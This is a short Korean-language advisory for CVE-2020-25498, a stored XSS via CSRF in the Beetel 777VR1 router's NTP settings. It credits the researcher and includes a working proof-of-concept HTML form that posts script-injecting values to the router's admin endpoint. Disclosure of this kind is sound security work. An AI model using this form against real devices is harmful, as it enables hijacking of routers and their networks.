
Beetel 777VR1 라우터의 CSRF를 통한 저장 XSS
취약한 엔드포인트는 서버 측 입력 검증이 없으며 악성 스크립트 주입에 대한 클라이언트 측 필터링이 부족한 것으로 확인되었습니다. 공격자는 이 취약점을 사용하여 엔드포인트에 악성 스크립트를 주입할 수 있으며, 사용자가 해당 엔드포인트를 열 때마다 스크립트가 활성화됩니다. 공격자는 POST 요청 페이로드가 포함된 악성 URL을 전송하여 CSRF를 통해 관리자 모듈에서 XSS를 실행하고, 최종적으로 장치와 네트워크를 장악할 수 있습니다.
연구자: Sayli Ambure (https://twitter.com/sayli_ambure)
MITRE CVE 링크: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498
CSRF HTML 코드:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/form2ntp.cgi" method="POST">
<input type="hidden" name="ntpstate" value="Enable" />
<input type="hidden" name="ntpserver" value='google.com"><script>alert(1)</script>' />
<input type="hidden" name="ntpserver2" value='google.com"><script>alert(2)</script>' />
<input type="hidden" name="ntpinterval" value="1" />
<input type="hidden" name="ntptimezone" value="330" />
<input type="hidden" name="submit.htm?time.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
파라미터: 서버 이름
파라미터: 키워드